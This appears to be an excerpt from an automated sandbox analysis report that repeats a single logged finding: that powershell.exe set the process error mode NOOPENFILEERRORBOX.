      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
